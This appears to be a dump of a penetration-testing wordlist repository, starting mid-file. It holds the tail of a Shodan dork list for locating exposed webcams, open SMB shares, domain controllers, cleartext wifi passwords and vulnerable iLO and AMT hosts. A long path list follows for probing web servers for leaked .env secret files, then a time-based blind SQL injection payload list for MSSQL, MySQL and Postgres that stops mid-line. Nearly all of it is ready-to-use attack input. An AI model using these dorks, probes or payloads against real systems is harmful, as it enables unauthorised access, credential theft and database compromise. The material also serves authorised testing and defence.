lighttpd"` 409 | `"Polycom Command Shell" -failed port:23` 410 | 411 | ### Telnet Configuration: 412 | 413 | `"Polycom Command Shell" -failed port:23` 414 | 415 | Example: Polycom Video Conferencing 416 | ### Bomgar Help Desk Portal 417 | 418 | `"Server: Bomgar" "200 OK"` 419 | 420 | ### Intel Active Management CVE-2017-5689 421 | 422 | `"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995` 423 | `”Active Management Technology”` 424 | 425 | ### HP iLO 4 CVE-2017-12542 426 | 427 | `HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900` 428 | 429 | ### Lantronix ethernet adapter’s admin interface without password 430 | `"Press Enter for Setup Mode port:9999"` 431 | 432 | ### Wifi Passwords: 433 | Helps to find the cleartext wifi passwords in Shodan. 434 | `html:"def_wirelesspassword"` 435 | 436 | ### Misconfigured Wordpress Sites: 437 | The wp-config.php if accessed can give out the database credentials. 438 | `http.html:"* The wp-config.php creation script uses this file"` 439 | 440 | # Outlook Web Access: 441 | ### Exchange 2007 442 | 443 | `"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"` 444 | 445 | ### Exchange 2010 446 | 447 | `"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392` 448 | 449 | ### Exchange 2013 / 2016 450 | 451 | `"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"` 452 | 453 | ### Lync / Skype for Business 454 | 455 | `"X-MS-Server-Fqdn"` 456 | 457 | # Network Attached Storage (NAS) 458 | ### SMB (Samba) File Shares 459 | 460 | Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc. 461 | 462 | `"Authentication: disabled" port:445` 463 | 464 | ### Specifically domain controllers: 465 | 466 | `"Authentication: disabled" NETLOGON SYSVOL -unix port:445` 467 | 468 | ### Concerning default network shares of QuickBooks files: 469 | 470 | `"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445` 471 | 472 | ### FTP Servers with Anonymous Login 473 | 474 | `"220" "230 Login successful." port:21` 475 | 476 | ### Iomega / LenovoEMC NAS Drives 477 | 478 | `"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"` 479 | 480 | ### Buffalo TeraStation NAS Drives 481 | 482 | `Redirecting sencha port:9000` 483 | 484 | ### Logitech Media Servers 485 | 486 | `"Server: Logitech Media Server" "200 OK"` 487 | 488 | Example: Logitech Media Servers 489 | ### Plex Media Servers 490 | 491 | `"X-Plex-Protocol" "200 OK" port:32400` 492 | 493 | ### Tautulli / PlexPy Dashboards 494 | 495 | `"CherryPy/5.1.0" "/home"` 496 | 497 | ### Home router attached USB 498 | `"IPC$ all storage devices"` 499 | 500 | # Webcams 501 | ### Generic camera search 502 | `title:camera` 503 | 504 | ### Webcams with screenshots 505 | `webcam has_screenshot:true` 506 | 507 | ### D-Link webcams 508 | `"d-Link Internet Camera, 200 OK"` 509 | 510 | ### Hipcam 511 | `"Hipcam RealServer/V1.0"` 512 | 513 | ### Yawcams 514 | 515 | `"Server: yawcam" "Mime-Type: text/html"` 516 | 517 | ### webcamXP/webcam7 518 | 519 | `("webcam 7" OR "webcamXP") http.component:"mootools" -401` 520 | 521 | ### Android IP Webcam Server 522 | 523 | `"Server: IP Webcam Server" "200 OK"` 524 | 525 | ### Security DVRs 526 | `html:"DVR_H264 ActiveX"` 527 | 528 | ### Surveillance Cams: 529 | With username:admin and password: :P
530 | `NETSurveillance uc-httpd` 531 | `Server: uc-httpd 1.0.0` 532 | 533 | # Printers & Copiers: 534 | ### HP Printers 535 | 536 | `"Serial Number:" "Built:" "Server: HP HTTP"` 537 | 538 | ### Xerox Copiers/Printers 539 | 540 | `ssl:"Xerox Generic Root"` 541 | 542 | ### Epson Printers 543 | 544 | `"SERVER: EPSON_Linux UPnP" "200 OK"` 545 | 546 | `"Server: EPSON-HTTP" "200 OK"` 547 | 548 | ### Canon Printers 549 | 550 | `"Server: KS_HTTP" "200 OK"` 551 | 552 | `"Server: CANON HTTP Server"` 553 | 554 | # Home Devices 555 | ### Yamaha Stereos 556 | 557 | `"Server: AV_Receiver" "HTTP/1.1 406"` 558 | 559 | ### Apple AirPlay Receivers 560 | 561 | Apple TVs, HomePods, etc. 562 | 563 | `"\x08_airplay" port:5353` 564 | 565 | ### Chromecasts / Smart TVs 566 | 567 | `"Chromecast:" port:8008` 568 | 569 | ### Crestron Smart Home Controllers 570 | 571 | `"Model: PYNG-HUB"` 572 | 573 | # Random Stuff 574 | ### Calibre libraries 575 | `"Server: calibre" http.status:200 http.title:calibre` 576 | 577 | ### OctoPrint 3D Printer Controllers 578 | 579 | `title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944` 580 | 581 | ### Etherium Miners 582 | 583 | `"ETH - Total speed"` 584 | 585 | 586 | ### Apache Directory Listings 587 | 588 | Substitute .pem with any extension or a filename like phpinfo.php. 589 | 590 | `http.title:"Index of /" http.html:".pem"` 591 | 592 | ### Misconfigured WordPress 593 | 594 | Exposed wp-config.php files containing database credentials. 595 | 596 | `http.html:"* The wp-config.php creation script uses this file"` 597 | 598 | ### Too Many Minecraft Servers 599 | 600 | `"Minecraft Server" "protocol 340" port:25565` 601 | 602 | ### Literally Everything in North Korea 603 | 604 | `net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24` -------------------------------------------------------------------------------- /env.txt: -------------------------------------------------------------------------------- 1 | /__tests__/test-become/.env 2 | /_static/.env 3 | /.c9/metadata/environment/.env 4 | /.docker/.env 5 | /.docker/laravel/app/.env 6 | /.env 7 | /.env.backup 8 | /.env.dev 9 | /.env.development.local 10 | /.env.docker.dev 11 | /.env.example 12 | /.env.local 13 | /.env.php 14 | /.env.prod 15 | /.env.production.local 16 | /.env.sample.php 17 | /.env.save 18 | /.env.stage 19 | /.env.test 20 | /.env.test.local 21 | /.env~ 22 | /.gitlab-ci/.env 23 | /.vscode/.env 24 | /3-sequelize/final/.env 25 | /07-accessing-data/begin/vue-heroes/.env 26 | /07-accessing-data/end/vue-heroes/.env 27 | /08-routing/begin/vue-heroes/.env 28 | /08-routing/end/vue-heroes/.env 29 | /09-managing-state/begin/vue-heroes/.env 30 | /09-managing-state/end/vue-heroes/.env 31 | /31_structure_tests/.env 32 | /acme_challenges/.env 33 | /acme-challenge/.env 34 | /acme/.env 35 | /actions-server/.env 36 | /admin-app/.env 37 | /admin/.env 38 | /adminer/.env 39 | /administrator/.env 40 | /agora/.env 41 | /alpha/.env 42 | /anaconda/.env 43 | /api/.env 44 | /api/src/.env 45 | /app_dir/.env 46 | /app_nginx_static_path/.env 47 | /app-order-client/.env 48 | /app/.env 49 | /app/client/.env 50 | /app/code/community/Nosto/Tagging/.env 51 | /app/config/.env 52 | /app/config/dev/.env 53 | /app/frontend/.env 54 | /app1-static/.env 55 | /app2-static/.env 56 | /apps/.env 57 | /apps/client/.env 58 | /Archipel/.env 59 | /asset_img/.env 60 | /assets/.env 61 | /Assignment3/.env 62 | /Assignment4/.env 63 | /audio/.env 64 | /awstats/.env 65 | /babel-plugin-dotenv/test/fixtures/as-alias/.env 66 | /babel-plugin-dotenv/test/fixtures/default/.env 67 | /babel-plugin-dotenv/test/fixtures/dev-env/.env 68 | /babel-plugin-dotenv/test/fixtures/empty-values/.env 69 | /babel-plugin-dotenv/test/fixtures/filename/.env 70 | /babel-plugin-dotenv/test/fixtures/override-value/.env 71 | /babel-plugin-dotenv/test/fixtures/prod-env/.env 72 | /back-end/app/.env 73 | /back/.env 74 | /backend/.env 75 | /backend/src/.env 76 | /backendfinaltest/.env 77 | /backup/.env 78 | /base_dir/.env 79 | /basic-network/.env 80 | /bgoldd/.env 81 | /bitcoind/.env 82 | /blankon/.env 83 | /blob/.env 84 | /blog/.env 85 | /blue/.env 86 | /bookchain-client/.env 87 | /bootstrap/.env 88 | /boxes/oracle-vagrant-boxes/ContainerRegistry/.env 89 | /boxes/oracle-vagrant-boxes/Kubernetes/.env 90 | /boxes/oracle-vagrant-boxes/OLCNE/.env 91 | /bucoffea/.env 92 | /build/.env 93 | /cardea/backend/.env 94 | /cdw-backend/.env 95 | /cgi-bin/.env 96 | /ch2-mytodo/.env 97 | /ch6-mytodo/.env 98 | /ch6a-mytodo/.env 99 | /ch7-mytodo/.env 100 | /ch7a-mytodo/.env 101 | /ch8-mytodo/.env 102 | /ch8a-mytodo/.env 103 | /ch8b-mytodo/.env 104 | /Chai/.env 105 | /challenge/.env 106 | /challenges/.env 107 | /charts/liveObjects/.env 108 | /chat-client/.env 109 | /chiminey/.env 110 | /client-app/.env 111 | /client/.env 112 | /client/mutual-fund-app/.env 113 | /client/src/.env 114 | /ClientApp/.env 115 | /clld_dir/.env 116 | /cmd/testdata/expected/dot_env/.env 117 | /code/api/.env 118 | /code/web/.env 119 | /CodeGolf.Web/ClientApp/.env 120 | /codenames-frontend/.env 121 | /collab-connect-web-application/server/.env 122 | /collected_static/.env 123 | /community/.env 124 | /conf/.env 125 | /config/.env 126 | /ContainerRegistry/.env 127 | /content/.env 128 | /core/.env 129 | /core/app/.env 130 | /core/Datavase/.env 131 | /core/persistence/.env 132 | /core/src/main/resources/org/jobrunr/dashboard/frontend/.env 133 | /counterblockd/.env 134 | /counterwallet/.env 135 | /cp/.env 136 | /cron/.env 137 | /cronlab/.env 138 | /cryo_project/.env 139 | /css/.env 140 | /custom/.env 141 | /d/.env 142 | /data/.env 143 | /database/.env 144 | /dataset1/.env 145 | /dataset2/.env 146 | /default/.env 147 | /delivery/.env 148 | /demo-app/.env 149 | /demo/.env 150 | /deploy/.env 151 | /developerslv/.env 152 | /development/.env 153 | /directories/.env 154 | /dist/.env 155 | /django_project_path/.env 156 | /django-blog/.env 157 | /django/.env 158 | /doc/.env 159 | /docker-compose/platform/.env 160 | /docker-elk/.env 161 | /docker-network-healthcheck/.env 162 | /docker-node-mongo-redis/.env 163 | /docker/.env 164 | /docker/app/.env 165 | /docker/compose/withMongo/.env 166 | /docker/compose/withPostgres/.env 167 | /docker/database/.env 168 | /docker/db/.env 169 | /docker/examples/compose/.env 170 | /docker/postgres/.env 171 | /docker/webdav/.env 172 | /docs/.env 173 | /dodoswap-client/.env 174 | /dotfiles/.env 175 | /download/.env 176 | /downloads/.env 177 | /e2e/.env 178 | /en/.env 179 | /engine/.env 180 | /env/.env 181 | /env/dockers/mariadb-test/.env 182 | /env/dockers/php-apache/.env 183 | /env/example/.env 184 | /env/template/.env 185 | /environments/local/.env 186 | /environments/production/.env 187 | /error/.env 188 | /errors/.env 189 | /example/.env 190 | /example02-golang-package/import-underscore/.env 191 | /example27-how-to-load-env/sample01/.env 192 | /example27-how-to-load-env/sample02/.env 193 | /examples/.env 194 | /examples/01-simple-model/.env 195 | /examples/02-complex-example/.env 196 | /examples/03-one-to-many-relationship/.env 197 | /examples/04-many-to-many-relationship/.env 198 | /examples/05-migrations/.env 199 | /examples/06-base-service/.env 200 | /examples/07-feature-flags/.env 201 | /examples/08-performance/.env 202 | /examples/09-production/.env 203 | /examples/10-subscriptions/.env 204 | /examples/11-transactions/.env 205 | /examples/drupal-separate-services/.env 206 | /examples/react-dashboard/backend/.env 207 | /examples/sdl-first/.env 208 | /examples/sdl-first/prisma/.env 209 | /examples/vue-dashboard/backend/.env 210 | /examples/web/.env 211 | /examples/with-cookie-auth-fauna/.env 212 | /examples/with-dotenv/.env 213 | /examples/with-firebase-authentication-serverless/.env 214 | /examples/with-react-relay-network-modern/.env 215 | /examples/with-relay-modern/.env 216 | /examples/with-universal-configuration-build-time/.env 217 | /exapi/.env 218 | /Exercise.Frontend/.env 219 | /Exercise.Frontend/train/.env 220 | /export/.env 221 | /fastlane/.env 222 | /favicons/.env 223 | /favs/.env 224 | /FE/huey/.env 225 | /fedex/.env 226 | /fhir-api/.env 227 | /files/.env 228 | /fileserver/.env 229 | /films/.env 230 | /Final_Project/Airflow_Dag/.env 231 | /Final_Project/kafka_twitter/.env 232 | /Final_Project/StartingFile/.env 233 | /finalVersion/lcomernbootcamp/projbackend/.env 234 | /FIRST_CONFIG/.env 235 | /first-network/.env 236 | /fisdom/fisdom/.env 237 | /fixtures/blocks/.env 238 | /fixtures/fiber-debugger/.env 239 | /fixtures/flight/.env 240 | /fixtures/kitchensink/.env 241 | /flask_test_uploads/.env 242 | /fm/.env 243 | /font-icons/.env 244 | /fonts/.env 245 | /front-app/.env 246 | /front-empathy/.env 247 | /front-end/.env 248 | /front/.env 249 | /front/src/.env 250 | /frontend/.env 251 | /frontend/momentum-fe/.env 252 | /frontend/react/.env 253 | /frontend/vue/.env 254 | /frontendfinaltest/.env 255 | /ftp/.env 256 | /ftpmaster/.env 257 | /gists/cache 258 | /gists/laravel 259 | /gists/pusher 260 | /github-connect/.env 261 | /grems-api/.env 262 | /grems-frontend/.env 263 | /Hash/.env 264 | /hasura/.env 265 | /Helmetjs/.env 266 | /hgs-static/.env 267 | /higlass-website/.env 268 | /home/.env 269 | /horde/.env 270 | /hotpot-app-frontend/.env 271 | /htdocs/.env 272 | /html/.env 273 | /http/.env 274 | /httpboot/.env 275 | /HUNIV_migration/.env 276 | /icon/.env 277 | /icons/.env 278 | /ikiwiki/.env 279 | /image_data/.env 280 | /Imagebord/.env 281 | /images/.env 282 | /img/.env 283 | /install/.env 284 | /InstantCV/server/.env 285 | /items/.env 286 | /javascript/.env 287 | /js-plugin/.env 288 | /js/.env 289 | /jsrelay/.env 290 | /jupyter/.env 291 | /khanlinks/.env 292 | /kibana/.env 293 | /kodenames-server/.env 294 | /kolab-syncroton/.env 295 | /Kubernetes/.env 296 | /lab/.env 297 | /laravel/.env 298 | /latest/.env 299 | /layout/.env 300 | /lcomernbootcamp/projbackend/.env 301 | /leafer-app/.env 302 | /ledger_sync/.env 303 | /legacy/tests/9.1.1 304 | /legacy/tests/9.2.0 305 | /legal/.env 306 | /lemonldap-ng-doc/.env 307 | /lemonldap-ng-fr-doc/.env 308 | /letsencrypt/.env 309 | /lib/.env 310 | /Library/.env 311 | /libs/.env 312 | /linux/.env 313 | /local/.env 314 | /log/.env 315 | /logging/.env 316 | /login/.env 317 | /mail/.env 318 | /mailinabox/.env 319 | /mailman/.env 320 | /main_user/.env 321 | /main/.env 322 | /manual/.env 323 | /master/.env 324 | /media/.env 325 | /memcached/.env 326 | /mentorg-lava-docker/.env 327 | /micro-app-react-communication/.env 328 | /micro-app-react/.env 329 | /mindsweeper/gui/.env 330 | /minified/.env 331 | /misc/.env 332 | /Modix/ClientApp/.env 333 | /monerod/.env 334 | /mongodb/config/dev/.env 335 | /monitoring/compose/.env 336 | /moodledata/.env 337 | /msks/.env 338 | /munki_repo/.env 339 | /music/.env 340 | /MyRentals.Web/ClientApp/.env 341 | /name/.env 342 | /new-js/.env 343 | /news-app/.env 344 | /nginx-server/.env 345 | /nginx/.env 346 | /niffler-frontend/.env 347 | /node_modules/.env 348 | /Nodejs-Projects/play-ground/login/.env 349 | /Nodejs-Projects/play-ground/ManageUserRoles/.env 350 | /noVNC/.env 351 | /Nuke.App.Ui/.env 352 | /oldsanta/.env 353 | /ops/vagrant/.env 354 | /option/.env 355 | /orientdb-client/.env 356 | /outputs/.env 357 | /owncloud/.env 358 | /packages/api/.env 359 | /packages/app/.env 360 | /packages/client/.env 361 | /packages/frontend/.env 362 | /packages/plugin-analytics/src/fixtures/analytics-ga-key/.env 363 | /packages/plugin-qiankun/examples/app1/.env 364 | /packages/plugin-qiankun/examples/app2/.env 365 | /packages/plugin-qiankun/examples/app3/.env 366 | /packages/plugin-qiankun/examples/master/.env 367 | /packages/react-scripts/fixtures/kitchensink/template/.env 368 | /packages/styled-ui-docs/.env 369 | /packages/web/.env 370 | /packed/.env 371 | /page-editor/.env 372 | /parity/.env 373 | /Passportjs/.env 374 | /patchwork/.env 375 | /path/.env 376 | /pfbe/.env 377 | /pictures/.env 378 | /playground/.env 379 | /plugin_static/.env 380 | /post-deployment/.vscode/.env 381 | /postfixadmin/.env 382 | /price_hawk_client/.env 383 | /prisma/.env 384 | /private/.env 385 | /processor/.env 386 | /prod/.env 387 | /projbackend/.env 388 | /project_root/.env 389 | /psnlink/.env 390 | /pt2/countries/src/.env 391 | /pt8/library-backend-gql/.env 392 | /pub/.env 393 | /public_html/.env 394 | /public_root/.env 395 | /public/.env 396 | /question2/.env 397 | /qv-frontend/.env 398 | /rabbitmq-cluster/.env 399 | /rails-api/react-app/.env 400 | /rasax/.env 401 | /react_todo/.env 402 | /redmine/.env 403 | /repo/.env 404 | /repos/.env 405 | /repository/.env 406 | /resources/.env 407 | /resources/docker/.env 408 | /resources/docker/mysql/.env 409 | /resources/docker/phpmyadmin/.env 410 | /resources/docker/rabbitmq/.env 411 | /resources/docker/rediscommander/.env 412 | /resourcesync/.env 413 | /rest/.env 414 | /restapi/.env 415 | /results/.env 416 | /robots/.env 417 | /root/.env 418 | /rosterBack/.env 419 | /roundcube/.env 420 | /roundcubemail/.env 421 | /routes/.env 422 | /run/.env 423 | /rust-backend/.env 424 | /rust-backend/dao/.env 425 | /s-with-me-front/.env 426 | /saas/.env 427 | /samples/chatroom/chatroom-spa/.env 428 | /samples/docker/deploymentscripts/.env 429 | /script/.env 430 | /scripts/.env 431 | /scripts/fvt/.env 432 | /selfish-darling-backend/.env 433 | /Serve_time_server/.env 434 | /serve-browserbench/.env 435 | /Server_with_db/.env 436 | /server/.env 437 | /server/config/.env 438 | /server/laravel/.env 439 | /server/src/persistence/.env 440 | /services/adminer/.env 441 | /services/deployment-agent/.env 442 | /services/documents/.env 443 | /services/graylog/.env 444 | /services/jaeger/.env 445 | /services/minio/.env 446 | /services/monitoring/.env 447 | /services/portainer/.env 448 | /services/redis-commander/.env 449 | /services/registry/.env 450 | /services/simcore/.env 451 | /services/traefik/.env 452 | /sessions/.env 453 | /shared/.env 454 | /shibboleth/.env 455 | /shop/.env 456 | /Simple_server/.env 457 | /site-library/.env 458 | /site/.env 459 | /sitemaps/.env 460 | /sites/.env 461 | /sitestatic/.env 462 | /Socketio/.env 463 | /sources/.env 464 | /Sources/API/.env 465 | /spearmint/.env 466 | /spikes/config-material-app/.env 467 | /SpotiApps/.env 468 | /src/__tests__/__fixtures__/instanceWithDependentSteps/.env 469 | /src/__tests__/__fixtures__/typeScriptIntegrationProject/.env 470 | /src/__tests__/__fixtures__/typeScriptProject/.env 471 | /src/__tests__/__fixtures__/typeScriptVisualizeProject/.env 472 | /src/.env 473 | /src/add-auth/express/.env 474 | /src/assembly/.env 475 | /src/character-service/.env 476 | /src/client/mobile/.env 477 | /src/core/tests/dotenv-files/.env 478 | /src/gameprovider-service/.env 479 | /src/main/front-end/.env 480 | /src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env 481 | /src/renderer/.env 482 | /srv6_controller/controller/.env 483 | /srv6_controller/examples/.env 484 | /srv6_controller/node-manager/.env 485 | /st-js-be-2020-movies-two/.env 486 | /stackato-pkg/.env 487 | /static_prod/.env 488 | /static_root/.env 489 | /static_user/.env 490 | /static-collected/.env 491 | /static-html/.env 492 | /static-root/.env 493 | /static/.env 494 | /staticfiles/.env 495 | /stats/.env 496 | /storage/.env 497 | /style/.env 498 | /styles/.env 499 | /stylesheets/.env 500 | /symfony/.env 501 | /system-config/.env 502 | /system/.env 503 | /target/.env 504 | /temanr9/.env 505 | /temanr10/.env 506 | /temp/.env 507 | /template/.env 508 | /templates/.env 509 | /test-network/.env 510 | /test-network/addOrg3/.env 511 | /test/.env 512 | /test/aries-js-worker/fixtures/.env 513 | /test/bdd/fixtures/adapter-rest/.env 514 | /test/bdd/fixtures/agent-rest/.env 515 | /test/bdd/fixtures/couchdb/.env 516 | /test/bdd/fixtures/demo/.env 517 | /test/bdd/fixtures/demo/openapi/.env 518 | /test/bdd/fixtures/did-method-rest/.env 519 | /test/bdd/fixtures/did-rest/.env 520 | /test/bdd/fixtures/edv-rest/.env 521 | /test/bdd/fixtures/openapi-demo/.env 522 | /test/bdd/fixtures/sidetree-mock/.env 523 | /test/bdd/fixtures/universalresolver/.env 524 | /test/bdd/fixtures/vc-rest/.env 525 | /test/fixtures/.env 526 | /test/fixtures/app_types/node/.env 527 | /test/fixtures/app_types/rails/.env 528 | /test/fixtures/node_path/.env 529 | /test/integration/env-config/app/.env 530 | /testfiles/.env 531 | /testing/docker/.env 532 | /tests/.env 533 | /Tests/Application/.env 534 | /tests/default_settings/v7.0/.env 535 | /tests/default_settings/v8.0/.env 536 | /tests/default_settings/v9.0/.env 537 | /tests/default_settings/v10.0/.env 538 | /tests/default_settings/v11.0/.env 539 | /tests/default_settings/v12.0/.env 540 | /tests/default_settings/v13.0/.env 541 | /tests/drupal-test/.env 542 | /tests/Integration/Environment/.env 543 | /tests/todo-react/.env 544 | /testwork_json/.env 545 | /theme_static/.env 546 | /theme/.env 547 | /thumb/.env 548 | /thumbs/.env 549 | /tiedostot/.env 550 | /tmp/.env 551 | /tools/.env 552 | /Travel_form/.env 553 | /ts/prime/.env 554 | /ubuntu/.env 555 | /ui/.env 556 | /unixtime/.env 557 | /unsplash-downloader/.env 558 | /upfiles/.env 559 | /upload/.env 560 | /uploads/.env 561 | /urlmem-app/.env 562 | /User_info/.env 563 | /v1/.env 564 | /v2/.env 565 | /var/backup/.env 566 | /vendor/.env 567 | /vendor/github.com/gobuffalo/envy/.env 568 | /vendor/github.com/subosito/gotenv/.env 569 | /videos/.env 570 | /vm-docker-compose/.env 571 | /vod_installer/.env 572 | /vue_CRM/.env 573 | /vue-end/vue-til/.env 574 | /vue/vuecli/.env 575 | /web-dist/.env 576 | /web/.env 577 | /Web/siteMariage/.env 578 | /webroot_path/.env 579 | /websocket/.env 580 | /webstatic/.env 581 | /webui/.env 582 | /well-known/.env 583 | /whturk/.env 584 | /windows/tests/9.2.x/.env 585 | /windows/tests/9.3.x/.env 586 | /wp-content/.env 587 | /www-data/.env 588 | /www/.env 589 | /xx-final/vue-heroes/.env 590 | /zmusic-frontend/.env 591 | -------------------------------------------------------------------------------- /sqli_blind_time-based.txt: -------------------------------------------------------------------------------- 1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' -- 2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' -- 3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' -- 4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' -- 5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' -- 6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' -- 7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__' 9 | '); if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' -- 10 | '); if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' -- 11 | '); if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' -- 12 | '); if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' -- 13 | '); if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' -- 14 | '); if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' -- 15 | '); if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' -- 16 | '); if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__' 17 | "; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' -- 18 | "; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' -- 19 | "; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' -- 20 | "; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' -- 21 | "; if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' -- 22 | "; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' -- 23 | "; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' -- 24 | "; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__' 25 | "); if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' -- 26 | "); if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' -- 27 | "); if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' -- 28 | "); if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' -- 29 | "); if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' -- 30 | "); if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' -- 31 | "); if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' -- 32 | "); if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__' 33 | sleep(__TIME__)# 34 | 1 or sleep(__TIME__)# 35 | " or sleep(__TIME__)# 36 | ' or sleep(__TIME__)# 37 | " or sleep(__TIME__)=" 38 | ' or sleep(__TIME__)=' 39 | 1) or sleep(__TIME__)# 40 | ") or sleep(__TIME__)=" 41 | ') or sleep(__TIME__)=' 42 | 1)) or sleep(__TIME__)# 43 | ")) or sleep(__TIME__)=" 44 | ')) or sleep(__TIME__)=' 45 | ;waitfor delay '0:0:__TIME__'-- 46 | );waitfor delay '0:0:__TIME__'-- 47 | ';waitfor delay '0:0:__TIME__'-- 48 | ";waitfor delay '0:0:__TIME__'-- 49 | ');waitfor delay '0:0:__TIME__'-- 50 | ");waitfor delay '0:0:__TIME__'-- 51 | ));waitfor delay '0:0:__TIME__'-- 52 | '));waitfor delay '0:0:__TIME__'-- 53 | "));waitfor delay '0:0:__TIME__'-- 54 | benchmark(10000000,MD5(1))# 55 | 1 or benchmark(10000000,MD5(1))# 56 | " or benchmark(10000000,MD5(1))# 57 | ' or benchmark(10000000,MD5(1))# 58 | 1) or benchmark(10000000,MD5(1))# 59 | ") or benchmark(10000000,MD5(1))# 60 | ') or benchmark(10000000,MD5(1))# 61 | 1)) or benchmark(10000000,MD5(1))# 62 | ")) or benchmark(10000000,MD5(1))# 63 | ')) or benchmark(10000000,MD5(1))# 64 | pg_sleep(__TIME__)-- 65 | 1 or pg_sleep(__TIME__)-- 66 | " or pg_sleep(__TIME__)-- 67 | ' or pg_sleep(__TIME__)-- 68 | 1) or pg_sleep(__TIME__)-- 69 | ") or pg_sleep(__TIME__)-- 70 | ') or pg_sleep(__TIME__)-- 71 | 1)) or pg_sleep(__TIME__)-- 72 | ")) or pg_sleep(__TIME__)-- 73 | ')) or pg_sleep(__TIME__)-- 74 | waitfor delay '0:0:__TIME__' /* 75 | waitfor delay '0:0:__TIME__' -- 76 | ' waitfor delay '0:0:__TIME__' /* 77 | ' waitfor delay '0:0:__TIME__' -- 78 | " waitfor delay '0:0:__TIME__' /* 79 | " waitfor delay '0:0:__TIME__' -- 80 | ) waitfor delay '0:0:__TIME__' /* 81 | ) waitfor delay '0:0:__TIME__' -- 82 | )) waitfor delay '0:0:__TIME__' /* 83 | )) waitfor delay '0:0:__TIME__' -- 84 | ))) waitfor delay '0:0:__TIME__' /* 85 | ))) waitfor delay '0:0:__TIME__' -- 86 | )))) waitfor delay '0:0:__TIME__' /* 87 | )))) waitfor delay '0:0:__TIME__' -- 88 | ))))) waitfor delay '0:0:__TIME__' -- 89 | )))))) waitfor delay '0:0:__TIME__' -- 90 | ') waitfor delay '0:0:__TIME__' /* 91 | ') waitfor delay '0:0:__TIME__' -- 92 | ") waitfor delay '0:0:__TIME__' /* 93 | ") waitfor delay '0:0:__TIME__' -- 94 | ')) waitfor delay '0:0:__TIME__' /* 95 | ')) waitfor delay '0:0:__TIME__' -- 96 | ")) waitfor delay '0:0:__TIME__' /* 97 | ")) waitfor delay '0:0:__TIME__' -- 98 | '))) waitfor delay '0:0:__TIME__' /* 99 | '))) waitfor delay '0:0:__TIME__' -- 100 | "))) waitfor delay '0:0:__TIME__' /* 101 | "))) waitfor delay '0:0:__TIME__' -- 102 | ')))) waitfor delay '0:0:__TIME__' /* 103 | ')))) waitfor delay '0:0:__TIME__' -- 104 | ")))) waitfor delay '0:0:__TIME__' /* 105 | ")))) waitfor delay '0:0:__TIME__' -- 106 | '))))) waitfor delay '0:0:__TIME__' /* 107 | '))))) waitfor delay '0:0:__TIME__' -- 108 | "))))) waitfor delay '0:0:__TIME__' /* 109 | "))))) waitfor delay '0:0:__TIME__' -- 110 | ')))))) waitfor delay '0:0:__TIME__' /* 111 | ')))))) waitfor delay '0:0:__TIME__' -- 112 | ")))))) waitfor delay '0:0:__TIME__' /* 113 | ")))))) waitfor delay '0:0:__TIME__' -- 114 | ) waitfor delay '0:0:__TIME__' /* 115 | ) waitfor delay '0:0:__TIME__' -- 116 | ') waitfor delay '0:0:__TIME__' /* 117 | ') waitfor delay '0:0:__TIME__' -- 118 | ") waitfor delay '0:0:__TIME__' /* 119 | ") waitfor delay '0:0:__TIME__' -- 120 | )) waitfor delay '0:0:__TIME__' /* 121 | )) waitfor delay '0:0:__TIME__' -- 122 | ')) waitfor delay '0:0:__TIME__' /* 123 | ')) waitfor delay '0:0:__TIME__' -- 124 | ")) waitfor delay '0:0:__TIME__' /* 125 | ")) waitfor delay '0:0:__TIME__' -- 126 | ,NULL) waitfor delay '0:0:__TIME__' /* 127 | ,NULL) waitfor delay '0:0:__TIME__' -- 128 | ',NULL) waifor delay '0:0:__TIME__' /* 129 | ',NULL) 